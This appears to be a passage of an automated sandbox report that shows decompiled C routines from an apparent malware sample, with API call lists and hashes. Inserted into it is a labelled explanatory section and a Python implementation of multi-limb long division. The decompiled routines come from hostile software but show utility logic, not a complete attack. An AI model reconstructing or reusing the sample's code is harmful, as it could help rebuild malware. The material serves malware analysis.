                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E00D48B37(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E00D44AA4(_t79,  &_v236);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00D42F01(_t101,  &_v236, _a8, _t96 - _t81);
                                					E00D42F01(_t79,  &_v92, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                					_t66 = E00D44AA4(_t101, 0xd4d1b0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E00D44AA4(_a16, _a4);
                                						E00D428BA(_t79,  &_v236, _a4, _t97);
                                						memset( &_v236, 0, 0x8c);
                                						_t55 = memset( &_v92, 0, 0x44);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L00D4AF6E();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L00D4AF68();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0xe8;
                                						_a12 = _t74;
                                						_t76 = E00D49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v92;
                                							if(E00D44506(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E00D4A708(_t79,  &_v92, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0xd4d1b0 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                (Instruction-address column for the function above, one address per decompiled line from 0x00d429f0 to 0x00d42b6c, omitted; the call-site addresses survive in the APIs list below.)

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 00D42A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00D42AB0
                                • memset.NTDLL ref: 00D42B50
                                • memset.NTDLL ref: 00D42B60
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: fe236909aebbf64d270c55f539e34065538f043aaacb9e6a3b2c1edfe8bd196d
                                • Instruction ID: 1dc08bff818945c6061c9aaf1c8a8f01455e949aa6ab773719d1157b9bea0165
                                • Opcode Fuzzy Hash: fe236909aebbf64d270c55f539e34065538f043aaacb9e6a3b2c1edfe8bd196d
                                • Instruction Fuzzy Hash: 7D418171A00219ABDB20DFA8CC82BEE7775EF44710F548529FD15AB280DB70AE49CB70
                                Uniqueness

                                Uniqueness Score: -1.00%
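E00D429ED has the shape of multi-limb unsigned long division (Knuth's Algorithm D) on 32-bit limbs: E00D48B37 yields the divisor's limb count, the loop at the end walks the top limb (`_t56 >>= 1`, at most 0x20 steps) to find its bit length so that both operands can be normalised by a shift of `0x20 - bits` (E00D42F01 into the two stack copies `_v236` and `_v92`), each quotient digit is estimated from the top two dividend limbs with `_allmul` / `_aulldiv` and clamped to 0xffffffff (`_t74 | 0xffffffff`), a multiply-subtract (E00D49947) follows, a correction loop guarded by a compare (E00D44506 / E00D4A708) fixes the digit, quotient digits are stored into the global at 0xd4d1b0, the remainder is de-normalised by E00D428BA into `_a4`, and the two `memset` calls wipe the stack copies before returning. Division of this kind is the building block of modular arithmetic such as RSA. The roles given to the helper functions here are inferred from the call pattern, not confirmed by the decompiler. The Python below is an added example, not code from the report or the sample: it implements Algorithm D with 32-bit limbs in the same decomposition (normalise, estimate, multiply-subtract, correct, de-normalise), using the standard two-limb refinement of the estimate where the decompiled code uses its repeated-subtract loop, and cross-checks itself against Python's built-in integers.

```python
"""Multi-limb unsigned division (Knuth Algorithm D) on 32-bit limbs.

Added example following the structure of the decompiled routine; it is not
code from the sample.  Limb lists are little-endian: index 0 is the least
significant limb, so the top limb is limbs[-1], matching the decompiled
`_t92 + _t79 * 4 - 4` access."""

BASE = 1 << 32
MASK = BASE - 1


def to_limbs(n, count=None):
    """Split a non-negative int into 32-bit limbs, zero-padded to `count`."""
    limbs = []
    while n:
        limbs.append(n & MASK)
        n >>= 32
    if count is not None:
        limbs += [0] * (count - len(limbs))
    return limbs


def from_limbs(limbs):
    return sum(limb << (32 * i) for i, limb in enumerate(limbs))


def bit_length32(limb):
    """Bit length of the top limb, computed like the decompiled shift loop
    (`_t56 >>= 1` until zero, at most 0x20 steps); 0x20 minus this is the shift."""
    bits = 0
    while bits < 32 and limb:
        bits += 1
        limb >>= 1
    return bits


def short_div(u, d):
    """Divide by a single limb: the n == 1 case Algorithm D cannot handle."""
    q, r = [0] * len(u), 0
    for i in range(len(u) - 1, -1, -1):
        cur = (r << 32) | u[i]
        q[i], r = cur // d, cur % d
    return q, [r]


def divmod_limbs(u, v):
    """Return (quotient limbs, remainder limbs) of u // v and u % v."""
    v = v[:]
    while v and v[-1] == 0:          # strip leading zero limbs of the divisor
        v.pop()
    if not v:
        raise ZeroDivisionError("division by zero")
    n = len(v)
    if n == 1:
        return short_div(u, v[0])
    if len(u) < n:
        return [0], u[:]
    # D1: normalise so that the divisor's top limb has its high bit set.
    s = 32 - bit_length32(v[-1])
    vn = to_limbs(from_limbs(v) << s, n)
    un = to_limbs(from_limbs(u) << s, len(u) + 1)
    m = len(u) - n
    q = [0] * (m + 1)
    for j in range(m, -1, -1):
        # D3: estimate the quotient digit from the top two dividend limbs.  The
        # decompiled code does this 64/32 division with _allmul/_aulldiv and
        # clamps the result to 0xffffffff; the refinement below keeps the
        # estimate within one of the true digit.
        num = (un[j + n] << 32) | un[j + n - 1]
        qhat, rhat = divmod(num, vn[n - 1])
        while qhat >= BASE or qhat * vn[n - 2] > ((rhat << 32) | un[j + n - 2]):
            qhat -= 1
            rhat += vn[n - 1]
            if rhat >= BASE:
                break
        # D4: multiply the divisor by qhat and subtract it from the window.
        carry = borrow = 0
        for i in range(n):
            p = qhat * vn[i] + carry
            carry = p >> 32
            t = un[i + j] - (p & MASK) - borrow
            un[i + j] = t & MASK
            borrow = 1 if t < 0 else 0
        t = un[j + n] - carry - borrow
        un[j + n] = t & MASK
        # D5/D6: the window went negative, so qhat was one too large; add the
        # divisor back and discard the final carry.
        if t < 0:
            qhat -= 1
            carry = 0
            for i in range(n):
                t = un[i + j] + vn[i] + carry
                un[i + j] = t & MASK
                carry = t >> 32
            un[j + n] = (un[j + n] + carry) & MASK
        q[j] = qhat
    # D8: undo the normalisation shift on the remainder.
    return q, to_limbs(from_limbs(un[:n]) >> s, n)


def check_against_python(a, b):
    """Cross-check the limb arithmetic against Python's built-in big integers."""
    q, r = divmod_limbs(to_limbs(a), to_limbs(b))
    return (from_limbs(q), from_limbs(r)) == divmod(a, b)


if __name__ == "__main__":
    # Constructed inputs; the second one exercises the add-back step.
    for a, b in [(2 ** 200 + 12345, 2 ** 70 + 7),
                 ((0x80000000 << 64) | 3, (0x20000000 << 64) | 1)]:
        print(hex(a), hex(b), check_against_python(a, b))
```

When re-implementing a routine like this from a decompilation, the cross-check against a trusted big-integer library is the important part: an off-by-one in the digit correction only shows up for inputs that trigger the add-back, which random testing rarely hits, so keep at least one such case (like the second constructed input above) in the regression set.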

                                C-Code - Quality: 87%
                                			E00D46150(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				short* _t19;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0xd4d270; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0xd4d2a8; // 0x253a5a8
                                				_t3 = _t8 + 0xd4e87e; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E00D410B1(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0xd4d2ac, 1, 0, _t30);
                                					E00D48B22(_t30);
                                				}
                                				_t12 =  *0xd4d25c; // 0x2000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E00D48F1B() != 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t31 = E00D43485(_t32, 0);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t19 =  *0xd4d10c( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 = _t19 + 2;
                                					}
                                					_t31 = E00D48B7B(0,  *_t32, _t19, 0);
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								CloseHandle(_t25);
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}

                                (Instruction-address column for the function above, one address per decompiled line from 0x00d46151 to 0x00d46244, omitted; the call-site addresses survive in the APIs list below.)

                                APIs
                                  • Part of subcall function 00D410B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,03289D18,00000000,?,?,69B25F44,00000005,00D4D00C,?,?,00D430FE), ref: 00D410E7
                                  • Part of subcall function 00D410B1: lstrcpy.KERNEL32(00000000,00000000), ref: 00D4110B
                                  • Part of subcall function 00D410B1: lstrcat.KERNEL32(00000000,00000000), ref: 00D41113
                                • CreateEventA.KERNEL32(00D4D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?), ref: 00D46191
                                  • Part of subcall function 00D48B22: RtlFreeHeap.NTDLL(00000000,00000000,00D4131A,00000000,?,?,00000000), ref: 00D48B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,00D4991F,00000000,00000000,?,00000000,?,00D4991F,?,00000001,?,?,?,?,00D47D37), ref: 00D461F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?), ref: 00D4621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,00D4991F,?,00000001,?,?,?,?,00D47D37), ref: 00D46237
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 8702c0d6477f1518a3701da51f583182602081855d7d883c97e51a0d6814c8c7
                                • Instruction ID: 3667cb97868b3776c9061f449595c53b93b73a005f8068df44d77f87f1e34b63
                                • Opcode Fuzzy Hash: 8702c0d6477f1518a3701da51f583182602081855d7d883c97e51a0d6814c8c7
                                • Instruction Fuzzy Hash: 7B213532A01311ABCB315F789CC4A6B7399EF8AB50F090625FD47EB211DBB0CC41867A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E00D49870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E00D42931(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t16 =  &(_t39[1]); // 0x5
                                						_t23 = _t16;
                                						if( *_t16 != 0) {
                                							E00D48DAB(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E00D4155A(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0xd4d2ac, 1, 0,  *0xd4d344);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E00D45BC0(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E00D44B2A(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E00D44FF0(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E00D46150( &_v32, _t39);
                                					goto L13;
                                				}
                                			}

                                APIs
                                • CreateEventA.KERNEL32(00D4D2AC,00000001,00000000,00000040,00000001,?,74E5F710,00000000,74E5F730,?,?,?,00D47D37,?,00000001,?), ref: 00D498C1
                                • SetEvent.KERNEL32(00000000,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498CE
                                • Sleep.KERNEL32(00000BB8,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498D9
                                • CloseHandle.KERNEL32(00000000,?,?,?,00D47D37,?,00000001,?,00000002,?,?,00D4312C,?), ref: 00D498E0
                                  • Part of subcall function 00D45BC0: WaitForSingleObject.KERNEL32(00000000,?,?,?,00D49900,?,00D49900,?,?,?,?,?,00D49900,?), ref: 00D45C9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                • String ID:
                                • API String ID: 2559942907-0
                                • Opcode ID: c069a6137c6549823f25083066ce5fe633518c5e390bb38c845615aca85d1cdd
                                • Instruction ID: 1a66444ea74722c015ae3dd6438e7b2e9d705360d1e77a4c5d7e0f6e7daab083
                                • Opcode Fuzzy Hash: c069a6137c6549823f25083066ce5fe633518c5e390bb38c845615aca85d1cdd
                                • Instruction Fuzzy Hash: 2A21A177D00219AFCB20AFE688859EFB3B9EF49350B095429FA51E7200DB70DD458BB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 78%
                                			E00D45F58(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                				intOrPtr _v8;
                                				void* _v12;
                                				void* _v16;
                                				intOrPtr _t26;
                                				intOrPtr* _t28;
                                				intOrPtr _t31;
                                				intOrPtr* _t32;
                                				void* _t39;
                                				int _t46;
                                				intOrPtr* _t47;
                                				int _t48;
                                
                                				_t47 = __eax;
                                				_push( &_v12);
                                				_push(__eax);
                                				_t39 = 0;
                                				_t46 = 0;
                                				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                				_v8 = _t26;
                                				if(_t26 < 0) {
                                					L13:
                                					return _v8;
                                				}
                                				if(_v12 == 0) {
                                					Sleep(0xc8);
                                					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                				}
                                				if(_v8 >= _t39) {
                                					_t28 = _v12;
                                					if(_t28 != 0) {
                                						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                						_v8 = _t31;
                                						if(_t31 >= 0) {
                                							_t46 = lstrlenW(_v16);
                                							if(_t46 != 0) {
                                								_t46 = _t46 + 1;
                                								_t48 = _t46 + _t46;
                                								_t39 = E00D41525(_t48);
                                								if(_t39 == 0) {
                                									_v8 = 0x8007000e;
                                								} else {
                                									memcpy(_t39, _v16, _t48);
                                								}
                                								__imp__#6(_v16);
                                							}
                                						}
                                						_t32 = _v12;
                                						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                					}
                                					 *_a4 = _t39;
                                					 *_a8 = _t46 + _t46;
                                				}
                                				goto L13;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeSleepStringlstrlenmemcpy
                                • String ID:
                                • API String ID: 1198164300-0
                                • Opcode ID: e5b262f53cb61013e1f3e2a7d5f6fd3df88a4598af6d4bddd6efcb83b6c4c63d
                                • Instruction ID: 61128ea56d46e82ed5b058d7c4e9ec155fbc6a931c4f7da28d827b43d6217926
                                • Opcode Fuzzy Hash: e5b262f53cb61013e1f3e2a7d5f6fd3df88a4598af6d4bddd6efcb83b6c4c63d
                                • Instruction Fuzzy Hash: 65217F79901609EFCB11DFA8D88499EBBB8FF49300B144169E906E7315EB30DA44CF71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E00D4A41C(unsigned int __eax, void* __ecx) {
                                				void* _v8;
                                				void* _v12;
                                				signed int _t21;
                                				signed short _t23;
                                				char* _t27;
                                				void* _t29;
                                				void* _t30;
                                				unsigned int _t33;
                                				void* _t37;
                                				unsigned int _t38;
                                				void* _t41;
                                				void* _t42;
                                				int _t45;
                                				void* _t46;
                                
                                				_t42 = __eax;
                                				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
                                				_t38 = __eax;
                                				_t30 = RtlAllocateHeap( *0xd4d238, 0, (__eax >> 3) + __eax + 1);
                                				_v12 = _t30;
                                				if(_t30 != 0) {
                                					_v8 = _t42;
                                					do {
                                						_t33 = 0x18;
                                						if(_t38 <= _t33) {
                                							_t33 = _t38;
                                						}
                                						_t21 =  *0xd4d250; // 0xad3c1077
                                						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
                                						 *0xd4d250 = _t23;
                                						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                                						memcpy(_t30, _v8, _t45);
                                						_v8 = _v8 + _t45;
                                						_t27 = _t30 + _t45;
                                						_t38 = _t38 - _t45;
                                						_t46 = _t46 + 0xc;
                                						 *_t27 = 0x2f;
                                						_t13 = _t27 + 1; // 0x1
                                						_t30 = _t13;
                                					} while (_t38 > 8);
                                					memcpy(_t30, _v8, _t38 + 1);
                                				}
                                				return _v12;
                                			}

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00D47C20,00000000,?,?,00D49DA0,?,032895B0), ref: 00D4A427
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 00D4A43F
                                • memcpy.NTDLL(00000000,?,-00000008,?,?,?,00D47C20,00000000,?,?,00D49DA0,?,032895B0), ref: 00D4A483
                                • memcpy.NTDLL(00000001,?,00000001), ref: 00D4A4A4
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: b54086d300dc636fe3efe951435980f595fe47a793a912226a12d9648064d9bf
                                • Instruction ID: 51dc3dbd214ec09f565e321a1838d0dbcc6876a9ad89c1284358188cdffaa1a0
                                • Opcode Fuzzy Hash: b54086d300dc636fe3efe951435980f595fe47a793a912226a12d9648064d9bf
                                • Instruction Fuzzy Hash: 2411E976A00214AFC7108FA9DC88D9EBBAFDBC5361B050276F508DB291E7B09E04C775
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D48C01(void* __esi) {
                                				struct _SECURITY_ATTRIBUTES* _v4;
                                				void* _t8;
                                				void* _t10;
                                
                                				_v4 = 0;
                                				memset(__esi, 0, 0x38);
                                				_t8 = CreateEventA(0, 1, 0, 0);
                                				 *(__esi + 0x1c) = _t8;
                                				if(_t8 != 0) {
                                					_t10 = CreateEventA(0, 1, 1, 0);
                                					 *(__esi + 0x20) = _t10;
                                					if(_t10 == 0) {
                                						CloseHandle( *(__esi + 0x1c));
                                					} else {
                                						_v4 = 1;
                                					}
                                				}
                                				return _v4;
                                			}

                                APIs
                                • memset.NTDLL ref: 00D48C0F
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,74E481D0), ref: 00D48C24
                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00D48C31
                                • CloseHandle.KERNEL32(?), ref: 00D48C43
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CreateEvent$CloseHandlememset
                                • String ID:
                                • API String ID: 2812548120-0
                                • Opcode ID: 236a364a88594c77b00935f14c2ed06ba2dc3c5b4af057cca4eddb679a5d8847
                                • Instruction ID: f39fdac323d98a186ab4c38f0bf80d8d5309a00745fa25f6f630923e28e66c97
                                • Opcode Fuzzy Hash: 236a364a88594c77b00935f14c2ed06ba2dc3c5b4af057cca4eddb679a5d8847
                                • Instruction Fuzzy Hash: E4F082B510530CBFD360AF26DCC4C2BBBACEB42299B15492EF142D2111CA72AC499AB0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00D44DB1() {
                                				void* _t1;
                                				intOrPtr _t5;
                                				void* _t6;
                                				void* _t7;
                                				void* _t11;
                                
                                				_t1 =  *0xd4d26c; // 0x208
                                				if(_t1 == 0) {
                                					L8:
                                					return 0;
                                				}
                                				SetEvent(_t1);
                                				_t11 = 0x7fffffff;
                                				while(1) {
                                					SleepEx(0x64, 1);
                                					_t5 =  *0xd4d2bc; // 0x0
                                					if(_t5 == 0) {
                                						break;
                                					}
                                					_t11 = _t11 - 0x64;
                                					if(_t11 > 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t6 =  *0xd4d26c; // 0x208
                                				if(_t6 != 0) {
                                					CloseHandle(_t6);
                                				}
                                				_t7 =  *0xd4d238; // 0x2e90000
                                				if(_t7 != 0) {
                                					HeapDestroy(_t7);
                                				}
                                				goto L8;
                                			}

                                APIs
                                • SetEvent.KERNEL32(00000208,00000001,00D47F41), ref: 00D44DBC
                                • SleepEx.KERNEL32(00000064,00000001), ref: 00D44DCB
                                • CloseHandle.KERNEL32(00000208), ref: 00D44DEC
                                • HeapDestroy.KERNEL32(02E90000), ref: 00D44DFC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: d9928a2763144a69cf466335a058f06423fc637219cee45e3ea6343bc2831ef1
                                • Instruction ID: b41e3fba8a06832bf5ef6190a19f25e5827f81da2a620ef31f69d90c91ca29bf
                                • Opcode Fuzzy Hash: d9928a2763144a69cf466335a058f06423fc637219cee45e3ea6343bc2831ef1
                                • Instruction Fuzzy Hash: 93F03079B12311DBDB205F359D89F077B99AB06761B0C4210F910D73A1DFA0CC80D674
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E10001402(void* __ecx, WCHAR** _a4) {
                                				struct HINSTANCE__* _v8;
                                				long _v12;
                                				long _t10;
                                				long _t19;
                                				long _t20;
                                				WCHAR* _t23;
                                
                                				_v8 =  *0x10004130;
                                				_t19 = 0x104;
                                				_t23 = E10001B5A(0x208);
                                				if(_t23 == 0) {
                                					L8:
                                					_t20 = 8;
                                					L9:
                                					return _t20;
                                				} else {
                                					goto L1;
                                				}
                                				while(1) {
                                					L1:
                                					_t10 = GetModuleFileNameW(_v8, _t23, _t19);
                                					_v12 = _t10;
                                					if(_t10 == 0 || _t19 != _t10) {
                                						break;
                                					}
                                					_t19 = _t19 + 0x104;
                                					E1000167E(_t23);
                                					_t23 = E10001B5A(_t19 + _t19);
                                					if(_t23 != 0) {
                                						continue;
                                					}
                                					break;
                                				}
                                				_t20 = 0;
                                				if(_t23 == 0) {
                                					goto L8;
                                				}
                                				if(_v12 == 0) {
                                					_t20 = GetLastError();
                                					E1000167E(_t23);
                                				} else {
                                					 *_a4 = _t23;
                                				}
                                				goto L9;
                                			}

                                APIs
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,?,100015E2,?), ref: 1000142B
                                • GetLastError.KERNEL32(?,?,?,100015E2,?), ref: 10001469
                                  • Part of subcall function 1000167E: HeapFree.KERNEL32(00000000,?,10001477,00000000,?,?,?,100015E2,?), ref: 1000168A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocErrorFileFreeLastModuleName
                                • String ID: @Mt MtTt
